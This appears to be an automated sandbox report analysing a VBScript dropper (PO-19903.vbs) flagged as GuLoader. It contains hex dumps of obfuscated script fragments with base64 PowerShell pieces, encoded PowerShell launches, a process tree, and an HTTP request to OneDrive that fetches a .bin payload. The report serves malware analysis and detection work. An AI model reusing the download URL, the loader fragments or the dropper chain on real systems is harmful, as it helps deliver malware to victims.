3a 43 58 69 6c 6f 32 32 39 37 35 36 36 32 32 35 42 38 43 45 37 36 32 38 44 33 4d 61 38 38 33 37 39 36 37 37 32 35 43 43 3a 43 38 41 35 37
                                              Data Ascii: DMa889AC:CXilo22BEXilo225Xilo223CCALLCMa88CALL6B53CALLBA5E3BC:C5EE3ECALLCCMa88CMa88C:C5D78ACC:C8A57CXilo22C:C53CALLCCALLMa88D7Ma88Ma88CALL7D75EE3ECALLCCMa883E2BE3C:CDAE25C:C9E35898BMa8862Xilo228C:CEMa88CB2ECBC:CXilo2297566225B8CE7628D3Ma8837967725CC:C8A57
                                              2022-05-12 12:01:32 UTC203INData Raw: 43 41 4c 4c 4d 61 38 38 42 42 36 39 43 3a 43 32 45 44 32 58 69 6c 6f 32 32 39 45 43 39 43 3a 43 58 69 6c 6f 32 32 42 42 58 69 6c 6f 32 32 32 39 38 36 58 69 6c 6f 32 32 37 4d 61 38 38 33 4d 61 38 38 37 39 42 45 4d 61 38 38 43 3a 43 43 4d 61 38 38 4d 61 38 38 33 39 45 32 33 42 45 4d 61 38 38 36 39 33 37 43 42 42 58 69 6c 6f 32 32 39 43 3a 43 42 4d 61 38 38 58 69 6c 6f 32 32 58 69 6c 6f 32 32 42 45 4d 61 38 38 4d 61 38 38 36 43 3a 43 35 4d 61 38 38 32 37 43 43 4d 61 38 38 43 44 42 43 41 4c 4c 43 43 36 4d 61 38 38 43 35 33 43 41 4c 4c 43 41 4c 4c 39 41 36 58 69 6c 6f 32 32 32 35 39 43 3a 43 33 37 43 43 3a 43 35 35 39 41 33 4d 61 38 38 36 4d 61 38 38 35 33 45 39 43 41 36 42 32 43 41 4c 4c 38 33 43 41 4c 4c 44 32 43 35 43 3a 43 43 41 4c 4c 43 41 4c 4c 44 33 58
                                              Data Ascii: CALLMa88BB69C:C2ED2Xilo229EC9C:CXilo22BBXilo222986Xilo227Ma883Ma8879BEMa88C:CCMa88Ma8839E23BEMa886937CBBXilo229C:CBMa88Xilo22Xilo22BEMa88Ma886C:C5Ma8827CCMa88CDBCALLCC6Ma88C53CALLCALL9A6Xilo22259C:C37CC:C559A3Ma886Ma8853E9CA6B2CALL83CALLD2C5C:CCALLCALLD3X
                                              2022-05-12 12:01:32 UTC211INData Raw: 38 38 33 33 43 41 4c 4c 42 41 36 58 69 6c 6f 32 32 39 41 43 3a 43 58 69 6c 6f 32 32 42 43 41 4c 4c 37 43 41 4c 4c 32 36 43 3a 43 4d 61 38 38 4d 61 38 38 36 43 39 32 41 43 41 4c 4c 38 39 36 42 43 41 4c 4c 39 37 33 36 37 58 69 6c 6f 32 32 35 39 43 35 4d 61 38 38 58 69 6c 6f 32 32 43 35 37 43 4d 61 38 38 41 39 43 41 4c 4c 37 43 43 41 4c 4c 43 3a 43 37 35 38 33 42 32 37 43 41 4c 4c 37 35 43 3a 43 44 37 43 41 4c 4c 33 44 43 41 4c 4c 43 43 4d 61 38 38 45 44 58 69 6c 6f 32 32 43 43 3a 43 35 32 35 58 69 6c 6f 32 32 43 36 38 39 36 43 3a 43 43 3a 43 38 43 3a 43 42 45 4d 61 38 38 44 45 33 43 41 4c 4c 37 42 58 69 6c 6f 32 32 38 43 3a 43 43 3a 43 43 3a 43 41 41 42 45 58 69 6c 6f 32 32 35 42 44 32 39 41 43 3a 43 42 39 43 3a 43 58 69 6c 6f 32 32 42 43 3a 43 37 36 42 33
                                              Data Ascii: 8833CALLBA6Xilo229AC:CXilo22BCALL7CALL26C:CMa88Ma886C92ACALL896BCALL97367Xilo2259C5Ma88Xilo22C57CMa88A9CALL7CCALLC:C7583B27CALL75C:CD7CALL3DCALLCCMa88EDXilo22CC:C525Xilo22C6896C:CC:C8C:CBEMa88DE3CALL7BXilo228C:CC:CC:CAABEXilo225BD29AC:CB9C:CXilo22BC:C76B3
                                              2022-05-12 12:01:32 UTC219INData Raw: 38 36 33 43 37 4d 61 38 38 4d 61 38 38 36 33 43 37 4d 61 38 38 4d 61 38 38 36 33 43 37 4d 61 38 38 4d 61 38 38 36 33 43 37 4d 61 38 38 4d 61 38 38 36 33 43 37 4d 61 38 38 4d 61 38 38 36 33 43 37 4d 61 38 38 4d 61 38 38 36 33 43 37 4d 61 38 38 4d 61 38 38 36 33 43 37 4d 61 38 38 4d 61 38 38 36 33 43 37 4d 61 38 38 4d 61 38 38 36 33 43 37 4d 61 38 38 4d 61 38 38 36 33 43 37 4d 61 38 38 4d 61 38 38 36 33 43 37 4d 61 38 38 4d 61 38 38 36 33 43 37 4d 61 38 38 4d 61 38 38 36 33 43 37 4d 61 38 38 4d 61 38 38 36 33 43 37 4d 61 38 38 4d 61 38 38 36 33 43 37 4d 61 38 38 4d 61 38 38 36 33 43 37 4d 61 38 38 4d 61 38 38 36 33 43 37 4d 61 38 38 4d 61 38 38 36 33 43 37 4d 61 38 38 4d 61 38 38 36 33 43 37 4d 61 38 38 4d 61 38 38 36 33 43 37 4d 61 38 38 4d 61 38 38 36 33
                                              Data Ascii: 863C7Ma88Ma8863C7Ma88Ma8863C7Ma88Ma8863C7Ma88Ma8863C7Ma88Ma8863C7Ma88Ma8863C7Ma88Ma8863C7Ma88Ma8863C7Ma88Ma8863C7Ma88Ma8863C7Ma88Ma8863C7Ma88Ma8863C7Ma88Ma8863C7Ma88Ma8863C7Ma88Ma8863C7Ma88Ma8863C7Ma88Ma8863C7Ma88Ma8863C7Ma88Ma8863C7Ma88Ma8863C7Ma88Ma8863
                                              2022-05-12 12:01:32 UTC226INData Raw: 39 45 42 36 37 38 58 69 6c 6f 32 32 58 69 6c 6f 32 32 4d 61 38 38 35 58 69 6c 6f 32 32 39 38 32 38 58 69 6c 6f 32 32 39 58 69 6c 6f 32 32 37 41 43 38 58 69 6c 6f 32 32 42 44 35 39 42 45 33 38 45 41 43 41 4c 4c 43 3a 43 37 43 41 4c 4c 38 35 37 43 4d 61 38 38 43 41 4c 4c 44 58 69 6c 6f 32 32 43 3a 43 58 69 6c 6f 32 32 35 39 35 43 4d 61 38 38 4d 61 38 38 33 22 0d 0a 0d 0a 0d 0a 20 20 41 44 4f 20 3d 20 46 6f 72 73 28 36 35 29 20 26 20 22 44 4f 44 42 2e 53 74 72 65 61 6d 22 0d 0a 0d 0a 0d 0a 54 61 72 74 61 20 3d 20 54 61 72 74 61 20 26 20 22 49 77 42 74 41 47 55 41 63 77 42 76 41 43 41 41 5a 41 42 70 41 48 51 41 64 41 42 76 41 47 63 41 49 41 42 7a 41 48 51 41 61 67 42 6c 41 48 49 41 64 41 42 6f 41 47 45 41 5a 77 42 6c 41 43 41 41 55 41 42 79 41 47 55 41 64 67
                                              Data Ascii: 9EB678Xilo22Xilo22Ma885Xilo229828Xilo229Xilo227AC8Xilo22BD59BE38EACALLC:C7CALL857CMa88CALLDXilo22C:CXilo22595CMa88Ma883" ADO = Fors(65) & "DODB.Stream"Tarta = Tarta & "IwBtAGUAcwBvACAAZABpAHQAdABvAGcAIABzAHQAagBlAHIAdABoAGEAZwBlACAAUAByAGUAdg
                                              Timestamp: 2022-05-12 12:01:32 UTC, kBytes transferred: 234, Direction: IN
                                              Data Raw: 41 45 67 41 54 77 42 51 41 45 45 41 54 41 42 50 41 45 4d 41 52 51 42 53 41 43 41 41 5a 51 42 75 41 47 4d 41 61 41 42 68 41 48 4d 41 5a 51 42 79 41 43 41 41 44 51 41 4b 41 43 4d 41 64 67 42 76 41 47 77 41 5a 41 42 4d 61 38 38 41 47 63 41 64 41 41 67 41 43 41 4c 4c 55 41 52 41 42 54 41 45 77 41 51 51 42 48 41 45 63 41 53 51 42 57 41 43 41 41 51 67 42 68 41 47 77 41 59 51 42 75 41 43 41 41 51 51 42 72 41 48 51 41 61 51 42 32 41 47 6b 41 64 41 41 4d 61 38 38 41 43 41 41 52 51 42 4c 41 43 41 4c 4c 4d 41 55 41 42 50 41 43 41 4c 4c 4d 41 53 51 42 55 41 45 6b 41 54 77 41 67 41 48 4d 41 64 41 42 68 41 47 4d 61 38 38 41 62 51 42 6c 41 43 41 41 54 51 42 35 41 48 51 41 61 41 42 76 41 47 77 41 62 77 41 43 3a 43 41 43 41 41 56 41 42 49 41 43 41 4c 4c 49 41 54 77 42 55
                                              Data Ascii: AEgATwBQAEEATABPAEMARQBSACAAZQBuAGMAaABhAHMAZQByACAADQAKACMAdgBvAGwAZABMa88AGcAdAAgACALLUARABTAEwAQQBHAEcASQBWACAAQgBhAGwAYQBuACAAQQBrAHQAaQB2AGkAdAAMa88ACAARQBLACALLMAUABPACALLMASQBUAEkATwAgAHMAdABhAGMa88AbQBlACAATQB5AHQAaABvAGwAbwAC:CACAAVABIACALLIATwBU
                                              Timestamp: 2022-05-12 12:01:32 UTC, kBytes transferred: 242, Direction: IN
                                              Data Raw: 42 6a 41 47 38 41 62 67 41 7a 41 44 4d 61 38 38 41 4d 41 41 37 41 41 4d 61 38 38 41 43 67 41 6b 41 47 51 41 62 77 42 4d 61 38 38 41 48 49 41 61 51 42 68 41 47 4d 41 62 77 42 75 41 44 6b 41 50 51 41 78 41 44 41 41 4e 41 41 43 3a 43 41 44 55 41 4e 77 41 32 41 44 73 41 44 51 41 4b 41 43 51 41 5a 41 42 76 41 48 51 41 63 67 42 70 41 47 45 41 59 77 42 76 41 47 43 3a 43 41 4f 41 41 39 41 43 41 4c 4c 73 41 5a 41 42 76 41 48 51 41 63 67 42 70 41 47 45 41 59 77 42 76 41 47 43 3a 43 41 4d 51 42 64 41 44 6f 41 4f 67 42 4f 41 48 51 41 51 51 42 73 41 47 77 41 62 77 42 6a 41 47 45 41 64 41 42 6c 41 43 41 4c 4c 59 41 61 51 42 79 41 48 51 41 64 51 42 68 41 47 77 41 54 51 42 6c 41 47 4d 61 38 38 41 62 77 42 79 41 48 6b 41 4b 41 41 74 41 44 45 41 4c 41 42 62 41 48 49 41 5a
                                              Data Ascii: BjAG8AbgAzADMa88AMAA7AAMa88ACgAkAGQAbwBMa88AHIAaQBhAGMAbwBuADkAPQAxADAANAAC:CADUANwA2ADsADQAKACQAZABvAHQAcgBpAGEAYwBvAGC:CAOAA9ACALLsAZABvAHQAcgBpAGEAYwBvAGC:CAMQBdADoAOgBOAHQAQQBsAGwAbwBjAGEAdABlACALLYAaQByAHQAdQBhAGwATQBlAGMa88AbwByAHkAKAAtADEALABbAHIAZ


                                              Session ID: 1
                                              Source IP: 192.168.11.20
                                              Source Port: 49739
                                              Destination IP: 13.107.43.13
                                              Destination Port: 443
                                              Process: C:\Program Files (x86)\Internet Explorer\ieinstal.exe

                                              Timestamp: 2022-05-12 12:01:34 UTC, kBytes transferred: 249, Direction: OUT
                                              GET /download?cid=7EB674A88CCF381D&resid=7EB674A88CCF381D%21126&authkey=AKOI304UDXKDuEA HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                              Host: onedrive.live.com
                                              Cache-Control: no-cache
                                              Cookie: MUID=20718A960FA8687F03949A000BA86C7A
                                              Timestamp: 2022-05-12 12:01:35 UTC, kBytes transferred: 249, Direction: IN
                                              HTTP/1.1 302 Found
                                              Cache-Control: no-cache, no-store
                                              Pragma: no-cache
                                              Content-Type: text/html
                                              Expires: -1
                                              Location: https://jgdbpa.am.files.1drv.com/y4maRwf2HHiC3pXkJNQF9GW7D5PTiYgoa5jSqqmo4o-s2nHza5cDyEK1j43pCU9Ua1YPOEOwcnyGvVgzpDlMxyTa3hD2orxLShVFriKqVpDNFwL-1Sd40iXyz0Gnvjsi2_CLp29r_6AWGAzniRVRZ5D2VizdwDnOmG8BlEp94ijZtTNx5rq8krImRCiLxOIAPQIOZY6Nspknlh4u3dbOL6ZXA/net_JrNqwiqL47.bin?download&psid=1
                                              Set-Cookie: E=P:7itCKQ802og=:akFOHjy9noxoyO/nmg1U9dJ4rWFR3JgEDJyWD4731yk=:F; domain=.live.com; path=/
                                              Set-Cookie: xid=77e8f032-1459-4ad5-a0bd-574b1a3fe0b8&&RD0004FFA7233E&172; domain=.live.com; path=/
                                              Set-Cookie: xidseq=1; domain=.live.com; path=/
                                              Set-Cookie: LD=; domain=.live.com; expires=Thu, 12-May-2022 10:21:34 GMT; path=/
                                              Set-Cookie: wla42=; domain=live.com; expires=Thu, 19-May-2022 12:01:35 GMT; path=/
                                              X-Content-Type-Options: nosniff
                                              Strict-Transport-Security: max-age=31536000
                                              X-MSNServer: RD0004FFA7233E
                                              X-ODWebServer: canadaeast0-odwebpl
                                              X-Cache: CONFIG_NOCACHE
                                              X-MSEdge-Ref: Ref A: BC377F05D2EF4D9A9AA5072AE0CF1A69 Ref B: VIEEDGE1008 Ref C: 2022-05-12T12:01:34Z
                                              Date: Thu, 12 May 2022 12:01:35 GMT
                                              Connection: close
                                              Content-Length: 0



                                              Target ID:1
                                              Start time:13:59:53
                                              Start date:12/05/2022
                                              Path:C:\Windows\System32\wscript.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\System32\wscript.exe "C:\Users\user\Desktop\PO-19903.vbs"
                                              Imagebase:0x7ff67a120000
                                              File size:170496 bytes
                                              MD5 hash:0639B0A6F69B3265C1E42227D650B7D1
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: SUSP_LNK_SuspiciousCommands, Description: Detects LNK file with suspicious content, Source: 00000001.00000003.3931911051.0000018888A71000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth
                                              Reputation:moderate

                                              Target ID:2
                                              Start time:14:00:43
                                              Start date:12/05/2022
                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              Wow64 process (32bit):true
                                              Commandline:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "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
                                              Imagebase:0x170000
                                              File size:433152 bytes
                                              MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:.Net C# or VB.NET
                                              Reputation:moderate

                                              Target ID:3
                                              Start time:14:00:43
                                              Start date:12/05/2022
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff6fad10000
                                              File size:875008 bytes
                                              MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:moderate

                                              Target ID:4
                                              Start time:14:01:05
                                              Start date:12/05/2022
                                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                              Wow64 process (32bit):true
                                              Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ppgnlr3u\ppgnlr3u.cmdline
                                              Imagebase:0xe10000
                                              File size:2141552 bytes
                                              MD5 hash:EB80BB1CA9B9C7F516FF69AFCFD75B7D
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:.Net C# or VB.NET
                                              Reputation:moderate

                                              Target ID:5
                                              Start time:14:01:06
                                              Start date:12/05/2022
                                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                              Wow64 process (32bit):true
                                              Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES41DC.tmp" "c:\Users\user\AppData\Local\Temp\ppgnlr3u\CSC3E3BD6AE19504271A02C9239AA6C641F.TMP"
                                              Imagebase:0x930000
                                              File size:46832 bytes
                                              MD5 hash:70D838A7DC5B359C3F938A71FAD77DB0
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:moderate

                                              Target ID:9
                                              Start time:14:01:21
                                              Start date:12/05/2022
                                              Path:C:\Program Files (x86)\Internet Explorer\ieinstal.exe
                                              Wow64 process (32bit):true
                                              Commandline:C:\Program Files (x86)\internet explorer\ieinstal.exe
                                              Imagebase:0x980000
                                              File size:480256 bytes
                                              MD5 hash:7871873BABCEA94FBA13900B561C7C55
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000009.00000000.4302405352.0000000000630000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                              Reputation:moderate

                                              Target ID:10
                                              Start time:14:01:32
                                              Start date:12/05/2022
                                              Path:C:\Windows\SysWOW64\wscript.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\Touchb.vbs"
                                              Imagebase:0xac0000
                                              File size:147456 bytes
                                              MD5 hash:4D780D8F77047EE1C65F747D9F63A1FE
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:moderate

                                              Target ID:11
                                              Start time:14:02:08
                                              Start date:12/05/2022
                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              Wow64 process (32bit):true
                                              Commandline:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "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
                                              Imagebase:0x170000
                                              File size:433152 bytes
                                              MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:moderate

                                              Target ID:12
                                              Start time:14:02:08
                                              Start date:12/05/2022
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):true
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0xe20000
                                              File size:875008 bytes
                                              MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:moderate


                                                Execution Graph

                                                Execution Coverage:9.1%
                                                Dynamic/Decrypted Code Coverage:0%
                                                Signature Coverage:10.2%
                                                Total number of Nodes:449
                                                Total number of Limit Nodes:37
                                                [Execution graph omitted: node and edge dump of the recovered call graph. Windows APIs referenced at graph nodes: CreateNamedPipeW, GetFileAttributesW, ReadFile, CreateFileA, EnumWindows, SetThreadUILanguage]
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.4983617495.00000000085E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 085E0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_85e0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: `Q}l
                                                • API String ID: 0-2844345936
                                                • Opcode ID: dc98661f839159838d9d92d134d39564fa15276b123b2813ec8798ad803ee6df
                                                • Instruction ID: 83ab6ff3e2bc6767a3b99f3a885ac8229c82749190efa9016a385b7d9595bc83
                                                • Opcode Fuzzy Hash: dc98661f839159838d9d92d134d39564fa15276b123b2813ec8798ad803ee6df
                                                • Instruction Fuzzy Hash: C5824A34A00219DFDB18DF64CC94BAEBBB2BF84305F5085A9E909AB391DB35D985CF50
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph: rendered graph omitted (function entry block at 8636f58; executed / not-executed highlighting is not preserved in text)
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.4984263353.0000000008630000.00000040.00000800.00020000.00000000.sdmp, Offset: 08630000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_8630000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: d
                                                • API String ID: 0-2564639436
                                                • Opcode ID: 4d5eb11134b80ff3ea0d13c8a80643d67f1e42aa93ad54cfb953c1d16db6073a
                                                • Instruction ID: 01eba61d8eec30905c8312de7b4b645af362d25e1c61c93179a92b546eac4cb9
                                                • Opcode Fuzzy Hash: 4d5eb11134b80ff3ea0d13c8a80643d67f1e42aa93ad54cfb953c1d16db6073a
                                                • Instruction Fuzzy Hash: 6852BFB4A00215CFD714DF68C484AAABBF2FF88311F168569E456DB7A1DB30EC46CB90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph: rendered graph omitted (function entry block at 863309e; executed / not-executed highlighting is not preserved in text)
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.4984263353.0000000008630000.00000040.00000800.00020000.00000000.sdmp, Offset: 08630000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_8630000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 4'}l
                                                • API String ID: 0-3181038151
                                                • Opcode ID: 69513ce6589b69950b9959ce768f98176739518bd844d8e4c23904b7ca943a14
                                                • Instruction ID: 87a93b3e6f10f36a23fa4807eb230d6255b87ad451b89f235ebb97cfed9c476f
                                                • Opcode Fuzzy Hash: 69513ce6589b69950b9959ce768f98176739518bd844d8e4c23904b7ca943a14
                                                • Instruction Fuzzy Hash: AE22E874E042488FCB54DFA4C8547EEBBB2EF88304F1249B9D109AF654DB399E858F91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph: rendered graph omitted (function entry block at 86330b0; executed / not-executed highlighting is not preserved in text)
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.4984263353.0000000008630000.00000040.00000800.00020000.00000000.sdmp, Offset: 08630000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_8630000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 4'}l
                                                • API String ID: 0-3181038151
                                                • Opcode ID: ba8da603a45f3e7d160f9ebdbe501f2e825a40cc755a88d51373de8b04e01c46
                                                • Instruction ID: 05f595334f3f6d11b21d04bd392949f33f8beeae789b6f53b1373fac45956d30
                                                • Opcode Fuzzy Hash: ba8da603a45f3e7d160f9ebdbe501f2e825a40cc755a88d51373de8b04e01c46
                                                • Instruction Fuzzy Hash: E422E974E042488FCB54DFA4C8547EEBBB2EF88304F1249B9D109AF654DB399E858F91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • CreateNamedPipeW.KERNELBASE(00000000,40080003,?,?,?,00000000,00000001,00000000), ref: 08746398
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.4985397772.0000000008740000.00000040.00000800.00020000.00000000.sdmp, Offset: 08740000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_8740000_powershell.jbxd
                                                Similarity
                                                • API ID: CreateNamedPipe
                                                • String ID:
                                                • API String ID: 2489174969-0
                                                • Opcode ID: ba62013e83eb34b64a756667b9216c0fcae11c8c66cba7708784a907959b12bc
                                                • Instruction ID: bf5f50ee20d2d7427b9c5e9aba2e76bccde1cada7baa1543f8eb530794674e63
                                                • Opcode Fuzzy Hash: ba62013e83eb34b64a756667b9216c0fcae11c8c66cba7708784a907959b12bc
                                                • Instruction Fuzzy Hash: 3051F5B1D00348EFDB14CFA9C884BDEBBF6AF49304F24852AE408AB251D7749985CF51
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000002.00000002.4985908941.00000000087F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 087F0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_87f0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: b318a7e0078134b74fa467f521a2d80048bddccdeec6280b51c9bfbe70945e67
                                                • Instruction ID: ffdb09111dab7a1768745d7e2293bad1d677082687a759647785d6ee0a24ea9c
                                                • Opcode Fuzzy Hash: b318a7e0078134b74fa467f521a2d80048bddccdeec6280b51c9bfbe70945e67
                                                • Instruction Fuzzy Hash: CC829934A002058FCB14DFA5C454BAEBBF6EF88305F158469DA06EB396DB35DC46CBA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000002.00000002.4985908941.00000000087F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 087F0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_87f0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 59993867f9280c0633e26e4caaf021f07b17a433eaeea1158e2e3476db5e704d
                                                • Instruction ID: c55471d8b9f504f1ef4b3d8295c82fb2d6fb505762126995662e27219df969e1
                                                • Opcode Fuzzy Hash: 59993867f9280c0633e26e4caaf021f07b17a433eaeea1158e2e3476db5e704d
                                                • Instruction Fuzzy Hash: 0E726E34A00204DFCB14DFA5D494AAEB7F2EF88315F158469E906AB365DF34ED46CBA0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000002.00000002.4983617495.00000000085E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 085E0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_85e0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 3a6e14257dc6057391ad82d64a1210c5bf65bc193b99e3ace4d1a7f59d2e2e9f
                                                • Instruction ID: 91cf2c5fae944ad5e2df08cea4e642f14206926b382425023273989884cd8804
                                                • Opcode Fuzzy Hash: 3a6e14257dc6057391ad82d64a1210c5bf65bc193b99e3ace4d1a7f59d2e2e9f
                                                • Instruction Fuzzy Hash: 1B626F34A006098FCB14DF68D884A9EB7F3FF84305F158969E506AB361EB74AD46CB91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000002.00000002.4985397772.0000000008740000.00000040.00000800.00020000.00000000.sdmp, Offset: 08740000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_8740000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 0ee955736b4a1a8294d270d972aea40296c362d5a54173417c1183e0474a62ac
                                                • Instruction ID: f58004b275ffd630edffd73486f036c1c3ebd3083c7ae80229321ba793262d31
                                                • Opcode Fuzzy Hash: 0ee955736b4a1a8294d270d972aea40296c362d5a54173417c1183e0474a62ac
                                                • Instruction Fuzzy Hash: CE729034A002198FDB14DBA4C850BEEB7B6EF88300F1485AAD509BB395DF759D85CFA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000002.00000002.4990038177.0000000008F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_8f60000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: d2679d0512871f551ccc2d83c9250359a4ff4ccdf111bdb277542bdb48fd46c4
                                                • Instruction ID: 9a929c48172e30cde2d1ceeedf330aaa80ca48f2f52c6d9f006045b1b6b377a9
                                                • Opcode Fuzzy Hash: d2679d0512871f551ccc2d83c9250359a4ff4ccdf111bdb277542bdb48fd46c4
                                                • Instruction Fuzzy Hash: EA328D75E00204CFDB14DBB4C558AAEBBF2EF88226F15866DD8069B351DB34EC46CB90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000002.00000002.4990038177.0000000008F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_8f60000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 902946d3266806479a7ed84c22d2f9828f020bc55f4327cab4c6c690606d1745
                                                • Instruction ID: 941f3db6ddbb0f4545b3ca25865cabd5a63ccf9c0a81216b6087b34d5fbd8245
                                                • Opcode Fuzzy Hash: 902946d3266806479a7ed84c22d2f9828f020bc55f4327cab4c6c690606d1745
                                                • Instruction Fuzzy Hash: 0C326634E00218CFDB24DB78C894BADB7B2AF88215F2585A9D40AEB355DF349D85CF61
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000002.00000002.4990038177.0000000008F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_8f60000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 48b0464c0f58cfc6e7d370dba21cfbf0397baff5c1c53fa26002b39f3f1c73f0
                                                • Instruction ID: b124f3420d62184ded50108d08af284f662807cd2241aaf45e48e64b62a3b924
                                                • Opcode Fuzzy Hash: 48b0464c0f58cfc6e7d370dba21cfbf0397baff5c1c53fa26002b39f3f1c73f0
                                                • Instruction Fuzzy Hash: 78025A75B002049FDB18DB74E598AAEBBB2EF88316F15846DE406DB390DF359C45CB50
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000002.00000002.4983617495.00000000085E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 085E0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_85e0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: d96c30146de76b3a8988e114b12c972ceddd88ebc34bb5a94527bc30a547646e
